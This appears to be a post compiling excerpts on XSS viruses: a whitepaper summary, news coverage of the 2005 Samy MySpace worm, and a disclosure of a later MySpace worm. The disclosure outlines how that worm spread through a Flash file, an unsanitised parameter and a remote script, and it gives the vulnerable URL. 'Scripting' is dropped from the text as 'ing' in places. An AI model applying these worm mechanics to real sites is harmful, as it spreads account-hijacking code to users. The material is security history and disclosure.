XSS Virus Whitepaper
Posted by jericho
http://www.securiteam.com/securityreviews/6H00D0KEAY.html http://www.bindshell.net/papers/xssv.html
XSS Virus Whitepaper
SUMMARY
The following paper explores the new threat of cross-site ing (XSS) viruses. To date, cross site ing has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact for Internet continuity, including distributed denial of service (DDOS) attacks, SPAM and dissemination of browser exploits. This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web based applications such as Wikis and Blogs.
[..]
Cross-Site Scripting Worm Hits MySpace By Nate Mook, BetaNews October 13, 2005, 6:28 PM http://www.betanews.com/article/CrossSiteScriptingWormHitsMySpace/1129232391
With the advent of social networking sites, becoming more popular is as easy as crafting a few lines of JavaScript code, it seems.
One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, “Samy” had amassed over 1 million friends on the popular online community.
How did Samy transcend his humble beginnings of only 73 friends to become a veritable global celebrity? The answer is a combination of XSS tricks and lax security in certain Web browsers.
[..]
By Andrew Orlowski in San Francisco Published Monday 17th October 2005 19:46 GMT http://www.theregister.co.uk/2005/10/17/web20wormknocksoutmyspaces/
It’s been a rough weekend for Tomorrow’s People. A JavaScript exploit that has been called the first “Web 2.0 worm” knocked out MySpace.com - and the $500m-valued website, recently acquired by Rupert Murdoch’s News Corp - was still struggling to get back on its feet two days later.
The cunning JavaScript exploit added a million users as “friends”, forcing the site offline. Service was restored on Friday but two days later the site was still struggling with the consequences, serving pages at a glacial pace.
[..]
A new MySpace worm is currently spreading, and thus far I have a good idea (I think) of how its spreading. Here it goes:
1) The attack starts with an Embedded .swf Flash file. 2) The flash file uses ActionScript to send a simple GET request to an UNSANITIZED (whew, embarrassing on MySpace’s part) variable by the name of TheName. 3) the GET request in #2, then loads a remote .js script. 4) the remote .js script then uses XML http send commands to execute the malicious part of the worm – changing first, last, and display names with “g0dOfTheN00se” and injects the malicious .swf file into several parts of the profile, including television.
The malicious XSS attack, without the .swf embedded attack and everything else is: http://myspace.com/PROFILE/COMMENTS.CFM?FriendID=6221&getComments.recordcount=1&TotalComments=1&MyUserID=6221&TheName=XSS
the malicious .swf file is actually being killed off by free host providers pretty quickly, and so is the sites hosting the .js file.
also, to top it off.. a special message is left by the author of the worm, it goes as follows: “MySpace Aids Is Back Bitch. Merry Christmas From ..!.g0dOfTheNoose.!.. .”
After the message, he/she embeds url to the malicious .swf flash file yet again, he’s a persistant little person. :)
http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0870.html
The case with MySpace is not the first one when for a special environment, such as social networking there is created self-propagating code. In August this year in Latvian Internet there appeared a conceptual code which was able to send himself to users of the site Draugiem.lv (analoque of MySpace.com). [..]